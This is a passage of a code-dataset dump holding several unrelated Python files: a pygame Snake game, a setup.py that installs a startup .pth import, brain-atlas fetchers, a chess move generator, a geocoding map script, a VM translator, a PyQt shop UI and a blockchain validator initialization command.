out]\n","sub_path":"talos/scan/scan_addon.py","file_name":"scan_addon.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"210934026","text":"import pygame\nimport random\n#pylint: disable=no-member\n#pylint: disable=too-many-function-args\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600))\npygame.display.set_caption('Snake')\nbackground = pygame.image.load('res/grass.png')\n\n\n########################################## Snake ##########################################\n\nclass Snake:\n def __init__(self):\n self.size = 1\n self.elements = [[100, 100]]\n self.radius = 10\n 
self.dx, self.dy = 2 * self.radius, 0 # right\n self.add = False\n\n def draw(self):\n for element in self.elements:\n pygame.draw.circle(screen, (255, 0, 200), element, self.radius)\n\n def move(self):\n self.elements.insert(\n 0, [self.elements[0][0] + self.dx, self.elements[0][1] + self.dy])\n if not self.add:\n self.elements.pop()\n else:\n self.size += 1\n self.add = False\n\n def randomNotInSnake(self):\n x = random.randint(1, 37) * 20 + 10\n y = random.randint(1, 27) * 20 + 10\n if [x + 10, y + 10] in self.elements:\n return self.randomNotInSnake()\n else:\n return [x, y]\n\n def checkCollisions(self):\n global done\n global gameOver\n if self.elements[0] in self.elements[1:]:\n done = True\n gameOver = True\n\n if not (32 < self.elements[0][0] < screen.get_width() - 32 and 32 < self.elements[0][1] < screen.get_height() - 32):\n done = True\n gameOver = True\n\n\n########################################## Walls ##########################################\n\nclass Walls:\n def __init__(self):\n self.image = pygame.image.load('res/wall.png')\n self.h = self.image.get_height()\n self.w = self.image.get_width()\n\n def draw(self):\n for i in range(screen.get_width() // self.w + 1):\n screen.blit(self.image, (i*self.w, 0))\n screen.blit(self.image, (i*self.w, screen.get_height() - self.h))\n\n for i in range(screen.get_height() // self.h + 1):\n screen.blit(self.image, (0, i*self.h))\n screen.blit(self.image, (screen.get_width() - self.w, i*self.h))\n\n\n########################################## Food ##########################################\n\n\nclass Food:\n def __init__(self):\n self.image = pygame.image.load('res/apple.png')\n self.x, self.y = 210, 210\n\n def draw(self):\n screen.blit(self.image, (self.x, self.y))\n\n\ndef isEaten(snake, food):\n dist_x = snake.elements[0][0] - food.x - snake.radius\n dist_y = snake.elements[0][1] - food.y - snake.radius\n if -snake.radius * 2 < dist_x < food.image.get_width() and -snake.radius * 2 < dist_y < food.image.get_height():\n return True\n else:\n return False\n\n\ndef drawScore(score):\n font = pygame.font.SysFont('Courier', 24, bold=True)\n text = font.render(f'Score: {score}', True, (0, 0, 0))\n screen.blit(text, (screen.get_width() - text.get_width() - 20, 10))\n\n########################################## Init ##########################################\n\n\nsnake = Snake()\nwalls = Walls()\nfood = Food()\n\ndone = False\ngameOver = False\n\nd = 20\nFPS = 10\nclock = pygame.time.Clock()\n\n########################################## Main loop ##########################################\n\nfont = pygame.font.SysFont('Courier', 48, bold=True)\nstart_text = font.render('Press space to start', True, (0, 0, 0))\nscreen.blit(background, (0, 0))\nscreen.blit(start_text, (screen.get_width() // 2 - start_text.get_width() // 2,\n screen.get_height() // 2 - start_text.get_height() // 2))\npygame.display.flip()\n\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if pygame.key.get_pressed()[pygame.K_SPACE]:\n break\n\nwhile not done:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_RIGHT and snake.dx != -d:\n snake.dx = d\n snake.dy = 0\n if event.key == pygame.K_LEFT and snake.dx != d:\n snake.dx = -d\n snake.dy = 0\n if event.key == pygame.K_UP and snake.dy != d:\n snake.dx = 0\n snake.dy = -d\n if event.key == pygame.K_DOWN and snake.dy != 
-d:\n snake.dx = 0\n snake.dy = d\n\n snake.move()\n snake.checkCollisions()\n if isEaten(snake, food):\n snake.add = True\n food.x, food.y = snake.randomNotInSnake()\n\n screen.blit(background, (0, 0))\n food.draw()\n snake.draw()\n walls.draw()\n drawScore(snake.size - 1)\n\n pygame.display.flip()\n\n\nif gameOver:\n end_text = font.render(f'Game Over. Score: {snake.size - 1}', True, (0, 0, 0))\n screen.blit(background, (0, 0))\n screen.blit(end_text, (screen.get_width() // 2 - end_text.get_width() // 2,\n screen.get_height() // 2 - end_text.get_height() // 2))\n pygame.display.flip()\n\n sec = 0\n while sec < 3:\n sec += clock.tick(30) / 1000\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sec = 3\n\npygame.quit()\n","sub_path":"Pygame/Projects/Yernur's Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"126900456","text":"import distutils\nimport os.path\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\n\nclass install(_install):\n def initialize_options(self):\n _install.initialize_options(self)\n # Use this prefix to get loaded as early as possible\n name = 'aaaaaa_deliverymethod'\n\n contents = 'import sys; import deliverymethod\\n'\n self.extra_path = (name, contents)\n\n def finalize_options(self):\n _install.finalize_options(self)\n\n install_suffix = os.path.relpath(\n self.install_lib, self.install_libbase,\n )\n if install_suffix == '.':\n distutils.log.info('skipping install of .pth during easy-install')\n elif install_suffix == self.extra_path[1]:\n self.install_lib = self.install_libbase\n distutils.log.info(\n \"will install .pth to '%s.pth'\",\n os.path.join(self.install_lib, self.extra_path[0]),\n )\n else:\n raise AssertionError(\n 'unexpected install_suffix',\n self.install_lib, self.install_libbase, install_suffix,\n )\n\n\nsetup(cmdclass={'install': install})\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"319908840","text":"\"\"\"\n\"\"\"\nimport pandas as pd\nfrom os.path import join\n\nfrom sklearn.datasets.base import Bunch\nfrom nilearn import datasets\nfrom nilearn.datasets.utils import _get_dataset_dir, _fetch_files\n\n\ndef _check_atlases(atlas_names):\n \"\"\"Check that the atlases provided are valid names, string or\n list of strings, otherwise raise an error.\n \"\"\"\n valid_atlases = ['harvard_oxford', 'destrieux', 'diedrichsen',\n 'juelich', 'jhu', 'mist']\n err_msg = (\"You provided atlas name(s) {0} which is \"\n \"not valid. 
Provide in {1}\")\n\n if isinstance(atlas_names, str):\n atlas_names = [atlas_names, ]\n\n for name in atlas_names:\n if name not in valid_atlases:\n raise ValueError(err_msg.format(name, valid_atlases))\n return atlas_names\n\n\ndef _fetch_atlas_diedrichsen(atlas_name):\n \"\"\"Cerebellum atlas registered to MNI with FNIRT\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['prob-1mm', 'prob-2mm', 'maxprob-thr50-1mm', 'maxprob-thr50-2mm',\n 'maxprob-thr25-1mm', 'maxprob-thr25-2mm', 'maxprob-thr0-1mm',\n 'maxprob-thr0-2mm']\n\n Returns\n -------\n maps : str\n Path to cerebellum atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'Cerebellum-MNIfnirt-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/Cerebellum/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/Cerebellum_MNIfnirt.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef _fetch_atlas_juelich(atlas_name):\n \"\"\"Juelich atlas\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['maxprob-thr0-1mm', 'maxprob-thr0-2mm',\n 'maxprob-thr25-1mm', 'maxprob-thr25-2mm', 'maxprob-thr50-1mm',\n 'maxprob-thr50-2mm', 'prob-1mm', 'prob-2mm']\n\n Returns\n -------\n maps : str\n Path to Juelich atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'Juelich-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/Juelich/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/Juelich.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef _fetch_atlas_jhu(atlas_name):\n \"\"\"John Hopkins University atlas\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['labels-1mm', 'labels-2mm']\n\n Returns\n -------\n maps : str\n Path to JHU atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'JHU-ICBM-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/JHU/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/JHU-labels.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef fetch_mist():\n \"\"\"Download MIST parcellation n=122\n https://mniopenresearch.org/articles/1-3\n\n Returns\n -------\n maps : str\n Path to MIST parcellation\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n url = 'https://ndownloader.figshare.com/files/9811081'\n opts = {'uncompress': True}\n data_dir = _get_dataset_dir('mist', data_dir=None,\n verbose=1)\n files = [(join('Release', 'Parcel_Information', 'MIST_122.csv'),\n url, opts),\n (join('Release', 'Parcellations', 'MIST_122.nii.gz'),\n url, opts)]\n files = _fetch_files(data_dir, files, resume=True, verbose=1)\n parcel_info = pd.read_csv(files[0], sep=';')\n names = parcel_info['name']\n df = 
pd.DataFrame(['Background'], columns=['name'])\n for i in range(names.shape[0]):\n df2 = pd.DataFrame([names[i]], columns=['name'])\n df = df.append(df2, ignore_index=True)\n return Bunch(maps=files[1], labels=df)\n\n\ndef fetch_atlases(atlas_names):\n \"\"\"Fetch atlases provided by name(s)\n\n Parameters\n ----------\n atlas_names : str or list of str\n Grab atlas from web given the name. Few are shipped with FSL\n and Nilearn.\n Valid options: ['harvard_oxford', 'destrieux', 'diedrichsen',\n 'juelich', 'jhu', 'mist']\n\n Returns\n -------\n data : dict\n Bunch of atlases\n \"\"\"\n data = {}\n atlas_names = _check_atlases(atlas_names)\n for atlas_name in atlas_names:\n if atlas_name == 'harvard_oxford':\n name = 'cort-maxprob-thr25-2mm'\n data[atlas_name] = datasets.fetch_atlas_harvard_oxford(name)\n elif atlas_name == 'destrieux':\n data[atlas_name] = datasets.fetch_atlas_destrieux_2009()\n elif atlas_name == 'diedrichsen':\n data[atlas_name] = _fetch_atlas_diedrichsen('maxprob-thr25-2mm')\n elif atlas_name == 'juelich':\n data[atlas_name] = _fetch_atlas_juelich('maxprob-thr25-2mm')\n elif atlas_name == 'jhu':\n data[atlas_name] = _fetch_atlas_jhu('labels-2mm')\n elif atlas_name == 'mist':\n data[atlas_name] = fetch_mist()\n else:\n raise ValueError(\"Not a valid atlas. Given atlas is exhausted\")\n return data\n","sub_path":"region_labeling/atlas.py","file_name":"atlas.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"583308471","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport pandas as pd\n\ndf = pd.read_csv('../../data/frog_tongue_adhesion.csv', comment='#')\n\ndf = df.rename(columns={'impact force (mN)': 'impf'})\n\ngb_frog = df.groupby('ID')\nmean_impf = gb_frog['impf'].mean()\nsem_impf = gb_frog['impf'].sem()\n\n# don't use\nsns.barplot(data=df, x='ID', y='impf')\n\nplt.figure()\nsns.boxplot(data=df, x='ID', y='impf')\n\nplt.figure()\n# keep an eye on \"AltAir\" or something like that. 
another plotting library.\n# sns.swarmplot(data=df, x='ID', y='impf')\n\n# could also consider overlaying this over box plot\nsns.swarmplot(data=df, x='ID', y='impf', hue='date')\nplt.show()\nplt.gca().legend_.remove()\n\n","sub_path":"created/4/l1.py","file_name":"l1.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"473790382","text":"import numpy as np\nimport functions\n\ndef getAllowedMovesForPiece(player,piece,piecePosition_i,chessBoard,onlyCaptureMoves,debug=False):\n allowedMoves=[]\n delta=getBasicMoves(piece,piecePosition_i,onlyCaptureMoves,debug)\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): piece=\",piece)\n for Delta in delta:\n validMove=True\n captureMove=False\n for i in range(1,8):\n if validMove==True and captureMove==False:\n Del=[d*i for d in Delta]\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): Del=\",Del)\n newPos,validMove,captureMove=checkMove(player,piece,piecePosition_i,Del,chessBoard,debug)\n if(validMove==True):\n if(piece==\"pawn\" and piecePosition_i[1]==6 and newPos[1]==7):\n allowedMoves.append([piece,\"knight\",piecePosition_i,newPos,captureMove,[False,False],False]) # [piece before, piece after, pos before, pos after, captured?, castle?, enPassant?]\n allowedMoves.append([piece,\"bishop\",piecePosition_i,newPos,captureMove,[False,False],False])\n allowedMoves.append([piece,\"rook\" ,piecePosition_i,newPos,captureMove,[False,False],False])\n allowedMoves.append([piece,\"queen\" ,piecePosition_i,newPos,captureMove,[False,False],False])\n else:\n allowedMoves.append([piece,piece,piecePosition_i,newPos,captureMove,[False,False],False])\n if(piece==\"pawn\" or piece==\"knight\" or piece==\"king\"):\n break\n else:\n break\n else:\n break\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): AllowedMoves=\",allowedMoves)\n return allowedMoves\n\ndef getBasicMoves(piece,piecePosition_i,onlyCaptureMoves,debug=False):\n delta=[]\n if piece==\"pawn\":\n delta=[[1,1],[-1,1]]\n if(piecePosition_i[1]==1 and onlyCaptureMoves==False):\n delta.append([0,1])\n delta.append([0,2])\n elif(onlyCaptureMoves==False):\n delta.append([0,1])\n elif(piece==\"knight\"):delta=[[1,2],[-1,2],[1,-2],[-1,-2],[2,1],[-2,1],[2,-1],[-2,-1]]\n elif(piece==\"bishop\"):delta=[[1,1],[-1,1],[1,-1],[-1,-1]]\n elif(piece==\"rook\") :delta=[[1,0],[-1,0],[0,1],[0,-1]]\n elif(piece==\"queen\" or piece==\"king\"): delta=[[1,1],[-1,1],[1,-1],[-1,-1],[1,0],[-1,0],[0,1],[0,-1]]\n else:print(\"(ERROR (moves (getBasicMoves)): Piece unknown!\")\n return delta\n\ndef checkMove(player,piece,piecePosition_i,delt,chessBoard,debug=False):\n playerColor= functions.getPlayerColor(player)\n opponentColor=functions.getPlayerColor(functions.getOpponent(player))\n validMove=False\n captureMove=False\n returnArray=[]\n newPos=np.add(piecePosition_i,delt).tolist()\n if(debug): print(\"DEBUG (moves (checkMove)): piece,piecePosition_i,delt,newPos=\",piece,piecePosition_i,delt,newPos)\n if(newPos[0]<0 or newPos[0]>7 or newPos[1]<0 or newPos[1]>7 or (playerColor in chessBoard[newPos[1]][newPos[0]])):\n if(debug): print(\"DEBUG (moves (checkMove)): Newpos=\",newPos,\"for\",piece,\"is invalid!\")\n returnArray=[newPos,False,False] #newPos,validMove,captureMove\n else:\n if piece!=\"pawn\":\n if(opponentColor in chessBoard[newPos[1]][newPos[0]]):\n returnArray=[newPos,True,True]\n else:\n returnArray=[newPos,True,False]\n elif piece==\"pawn\":\n if(delt==[0,1]): # normal move\n 
if(chessBoard[newPos[1]][newPos[0]]==\" \"):\n returnArray=[newPos,True,False]\n else:\n returnArray=[newPos,False,False]\n elif(delt==[0,2]): # normal move (Check also in-between position)\n inBetweenPos=np.add(piecePosition_i,[0,1]).tolist()\n if(chessBoard[inBetweenPos[1]][inBetweenPos[0]]==\" \" and chessBoard[newPos[1]][newPos[0]]==\" \"):\n returnArray=[newPos,True,False]\n else:\n returnArray=[newPos,False,False]\n elif(delt==[1,1] or delt==[-1,1]): # capture move\n if(opponentColor in chessBoard[newPos[1]][newPos[0]]):\n returnArray=[newPos,True,True]\n else:\n returnArray=[newPos,False,False]\n else:\n print(\"ERROR (moves (checkMove)): Player\",player,\"'s pawn move from piecePosition_i=\",piecePosition_i,\"with delt=\",delt,\"is neither normal nor capture move! => move not allowed!\")\n else:\n returnArray=[newPos,False,False]\n return returnArray[0],returnArray[1],returnArray[2]\n","sub_path":"playingCodePreviousVersions/PlayingCode_1_1/moves.py","file_name":"moves.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"407331908","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport googlemaps\n\n\n# In[2]:\n\n\nmurders = pd.read_csv(\"C:/Users/Kyle Haberman/Documents/pamurders.csv\")\n\n\n# In[3]:\n\n\ncities = murders[\"City\"]\ncities = pd.DataFrame(cities)\n\n\n# In[4]:\n\n\ngmaps_key = googlemaps.Client(key = \"\") #api key\n\n\n# In[5]:\n\n\ncities[\"LAT\"] = None\ncities[\"LON\"] = None\n\n\n# In[6]:\n\n\nfor i in range(0, len(cities), 1):\n geocode_result = gmaps_key.geocode(cities.iat[i,0])\n try: \n lat = geocode_result[0][\"geometry\"][\"location\"][\"lat\"]\n lon = geocode_result[0][\"geometry\"][\"location\"][\"lng\"]\n cities.iat[i, cities.columns.get_loc(\"LAT\")] = lat\n cities.iat[i, cities.columns.get_loc(\"LON\")] = lon\n except:\n lat = None\n lon = None\n \ncities\n\n\n# In[7]:\n\n\ncities['Murders'] = murders['Murders']\ncities['Murders/100K'] = murders['Murders/100K']\ncities\n\n\n# In[8]:\n\n\nlocations = cities[['LAT', 'LON']]\nlocationlist = locations.values.tolist()\nlen(locationlist)\nlocationlist[7]\n\n\n# In[9]:\n\n\nimport folium\n\nm = folium.Map(location=[41, -77.5], tiles='cartodbpositron',\n zoom_start=7, control_scale=True)\nfor point in range(0, len(locationlist)):\n folium.CircleMarker(locationlist[point], popup=cities['City'][point], radius=int(cities.iloc[point]['Murders'])/11,\n color=\"red\", fill=True).add_to(m)\nm\n\n","sub_path":"geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"529123726","text":"import code_writer\nimport vm_parser\n\n\ndef main(vm):\n line_num = 0\n asm = ''\n vm_lines = vm_parser.strip(vm) #strip comments and whitespace\n for line in vm_lines:\n commands = line.split() #separate commands, remove whitespace\n if len(commands) == 1: #arithmetic operation\n asm = asm + code_writer.writeArithmetic(commands[0], line_num)\n else: #pushpop\n asm = asm + code_writer.writePushPop(commands)\n line_num = line_num+1 \n return asm + code_writer.end_loop()\n\nif __name__ == \"__main__\":\n file_in = open(r\"StackArithmetic\\SimpleAdd\\SimpleAdd.vm\", \"r\")\n convert = main(file_in)\n out = open(\"StackArithmetic\\SimpleAdd\\simpleAdd.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"StackArithmetic\\StackTest\\StackTest.vm\", \"r\")\n convert = 
main(file_in)\n out = open(\"StackArithmetic\\StackTest\\StackTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\BasicTest\\BasicTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\BasicTest\\BasicTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\PointerTest\\PointerTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\PointerTest\\PointerTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\StaticTest\\StaticTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\StaticTest\\StaticTest.asm\", \"w\")\n out.write(convert)","sub_path":"07/vm_translator.py","file_name":"vm_translator.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"171742416","text":"from PyQt4 import QtCore, QtGui\r\nimport sys #bll main buttons\r\nimport sqlite3\r\nimport os\r\n\r\n\r\nfullpath=os.path.join(os.pardir,'DAL')\r\nsys.path.append(fullpath)\r\nfrom searchdatabase import Search\r\n\r\nclass ButtonControl(object):\r\n def loadData():\r\n data,connection,cursor=Search.loadDatabase()\r\n return (data, connection, cursor)\r\n def searchButton(search=None):\r\n result, connection, cursor =Search.searchDatabase(search)\r\n return (result, connection, cursor)\r\n def aboutButton():\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Online flowershop service\")\r\n msg.setInformativeText(\" Coe125-C1 \\n\\n Created by:\\n Aquino, Mark\\n Chua, Cyrille Lan\\n Hubalde,Angelo \\n Martinez, Rain\") \r\n msg.setWindowTitle(\"About\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n retval = msg.exec_()\r\n def helpButton():\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Instructions\")\r\n msg.setInformativeText( '-To see all of the available items, use the \"load\" button. \\n-Use the < and > buttons to get or remove items from the cart. \\n-A \"search\" button is available to look for specific items.\\n-Use the \"reset\" button to quickly empty the cart. 
\\n-Use the \"purchase\" button to confirm your purchase.') \r\n msg.setWindowTitle(\"Help\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n \r\n\t\r\n retval = msg.exec_()\r\n \r\n def purchaseButton(price,userID,itemID):\r\n Search.insertDatabase(price,userID,itemID)\r\n\r\n\r\n \r\n\r\n def checkCart(empty,price,userID,itemID):\r\n if empty==True:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"There must be at least a single item in the cart first.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n retval = msg.exec_()\r\n else :\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Are you done purchasing?\")\r\n \r\n msg.setWindowTitle(\"Confirmation\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)\r\n \r\n\t\r\n retval = msg.exec_()\r\n print(retval)\r\n if retval==1024:\r\n ButtonControl.purchaseButton(price,userID,itemID)\r\n return False\r\n return True\r\n def itemID(item,quantity):\r\n itemID=Search.getItemID(item)\r\n Search.updateItem(item,quantity)\r\n itemID=itemID+\",\"+quantity+\":\"\r\n return itemID\r\n \r\n def lessThanError(value):\r\n if value==1:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"There are currently no available stock of this item.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n msg.exec_()\r\n\r\n\r\n else:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"You cannot exceed the amount available in the stock.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n msg.exec_()\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"Source_code/BLL/mainButtonControl.py","file_name":"mainButtonControl.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"642529610","text":"import json\nimport logging\nimport os\nfrom pathlib import Path\nfrom urllib.request import Request, urlopen\n\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import URLValidator\nfrom django.db.models import Q\nfrom thenewboston.base_classes.initialize_node import InitializeNode\nfrom thenewboston.constants.network import (\n BLOCK_IDENTIFIER_LENGTH,\n CONFIRMATION_VALIDATOR,\n HEAD_HASH_LENGTH,\n PRIMARY_VALIDATOR\n)\nfrom thenewboston.utils.files import get_file_hash, read_json, write_json\n\nfrom v1.accounts.models.account import Account\nfrom v1.cache_tools.helpers import rebuild_cache\nfrom v1.self_configurations.models.self_configuration import SelfConfiguration\nfrom v1.validators.models.validator import Validator\n\n\"\"\"\npython3 manage.py initialize_validator\n\nPrerequisites:\n- python3 manage.py makemigrations\n- python3 manage.py migrate\n- python3 manage.py createsuperuser (optional)\n\nRunning this script will:\n- delete existing SelfConfiguration and related Validator objects\n- create SelfConfiguration and related Validator objects\n- create Account objects based on downloaded root_account_file\n- rebuild cache\n\"\"\"\n\nLOCAL_ROOT_ACCOUNT_FILE_PATH = os.path.join(settings.TMP_DIR, 'root_account_file.json')\n\nlogger = logging.getLogger('thenewboston')\n\n\nclass Command(InitializeNode):\n help = 
'Initialize validator'\n\n def __init__(self):\n super().__init__()\n\n self.required_input = {\n 'account_number': None,\n 'default_transaction_fee': None,\n 'head_block_hash': None,\n 'ip_address': None,\n 'node_identifier': None,\n 'node_type': None,\n 'port': None,\n 'protocol': None,\n 'root_account_file': None,\n 'root_account_file_hash': None,\n 'seed_block_identifier': None,\n 'version': None\n }\n\n @staticmethod\n def download_root_account_file(*, url, destination_file_path):\n \"\"\"\n Download root account JSON file and save\n \"\"\"\n\n print('Downloading file...')\n request = Request(url)\n response = urlopen(request)\n results = json.loads(response.read())\n write_json(destination_file_path, results)\n\n def get_head_block_hash(self):\n \"\"\"\n Get head block hash\n \"\"\"\n\n if not self.required_input['seed_block_identifier']:\n return\n\n valid = False\n\n while not valid:\n head_block_hash = input('Enter head_block_hash: ')\n\n if not head_block_hash:\n break\n\n if len(head_block_hash) != HEAD_HASH_LENGTH:\n self._error(f'head_block_hash must be {HEAD_HASH_LENGTH} characters long')\n continue\n\n self.required_input['head_block_hash'] = head_block_hash\n valid = True\n\n def get_node_type(self):\n \"\"\"\n Get node type\n \"\"\"\n\n valid = False\n\n while not valid:\n node_type = input('Enter node_type (required): ')\n\n if not node_type:\n continue\n\n if node_type not in [CONFIRMATION_VALIDATOR, PRIMARY_VALIDATOR]:\n self._error(f'node_type must be one of {CONFIRMATION_VALIDATOR} or {PRIMARY_VALIDATOR}')\n continue\n\n self.required_input['node_type'] = node_type\n valid = True\n\n def get_root_account_file(self):\n \"\"\"\n Get root account file from user\n \"\"\"\n\n valid = False\n\n while not valid:\n root_account_file = input('Enter root account file URL (required): ')\n\n if not root_account_file:\n self._error('root_account_file required')\n continue\n\n try:\n url_validator = URLValidator(schemes=['http', 'https'])\n url_validator(root_account_file)\n except ValidationError:\n self._error('Invalid URL')\n continue\n\n if Path(root_account_file).suffix != '.json':\n self._error('JSON file required')\n continue\n\n try:\n self.download_root_account_file(\n url=root_account_file,\n destination_file_path=LOCAL_ROOT_ACCOUNT_FILE_PATH\n )\n except Exception as e:\n logger.exception(e)\n self.stdout.write(self.style.ERROR(f'Error downloading {root_account_file}'))\n self.stdout.write(self.style.ERROR(e))\n\n file_hash = get_file_hash(LOCAL_ROOT_ACCOUNT_FILE_PATH)\n\n if not self.required_input['head_block_hash']:\n self.required_input['head_block_hash'] = file_hash\n\n self.required_input.update({\n 'root_account_file': root_account_file,\n 'root_account_file_hash': file_hash\n })\n valid = True\n\n def get_seed_block_identifier(self):\n \"\"\"\n Get seed block identifier from user\n \"\"\"\n\n valid = False\n\n while not valid:\n seed_block_identifier = input('Enter seed block identifier: ')\n\n if not seed_block_identifier:\n self.required_input['seed_block_identifier'] = ''\n break\n\n if len(seed_block_identifier) != BLOCK_IDENTIFIER_LENGTH:\n self._error(\n f'Invalid character length for seed_block_identifier\\n\\n'\n f'Enter a {BLOCK_IDENTIFIER_LENGTH} character value when branching from an existing network\\n'\n f'- recommended\\n'\n f'- set value to the identifier of the last block used when root_account_file was generated\\n\\n'\n f'Enter nothing if initializing a test network\\n'\n f'- not recommended\\n'\n f'- used for development'\n )\n continue\n\n 
self.required_input['seed_block_identifier'] = seed_block_identifier\n valid = True\n\n def handle(self, *args, **options):\n \"\"\"\n Run script\n \"\"\"\n\n # Input values\n self.get_verify_key(\n attribute_name='node_identifier',\n human_readable_name='node identifier'\n )\n self.get_verify_key(\n attribute_name='account_number',\n human_readable_name='account number'\n )\n self.get_fee(\n attribute_name='default_transaction_fee',\n human_readable_name='default transaction fee'\n )\n self.get_node_type()\n self.get_seed_block_identifier()\n self.get_head_block_hash()\n self.get_root_account_file()\n self.get_protocol()\n self.get_ip_address()\n self.get_port()\n self.get_version_number()\n\n self.initialize_validator()\n\n def initialize_validator(self):\n \"\"\"\n Process to initialize validator:\n - delete existing SelfConfiguration and related Validator objects\n - create SelfConfiguration and related Validator objects\n - create Account objects based on downloaded root_account_file\n - rebuild cache\n \"\"\"\n\n head_block_hash = self.required_input.pop('head_block_hash')\n node_type = self.required_input.pop('node_type')\n\n # Delete existing SelfConfiguration and related Validator objects\n SelfConfiguration.objects.all().delete()\n Validator.objects.filter(\n Q(ip_address=self.required_input['ip_address']) |\n Q(node_identifier=self.required_input['node_identifier'])\n ).delete()\n\n # Create SelfConfiguration and related Validator objects\n SelfConfiguration.objects.create(\n **self.required_input,\n node_type=node_type\n )\n self.update_accounts_table()\n\n # Rebuild cache\n rebuild_cache(head_block_hash=head_block_hash)\n\n self.stdout.write(self.style.SUCCESS('Validator initialization complete'))\n\n @staticmethod\n def 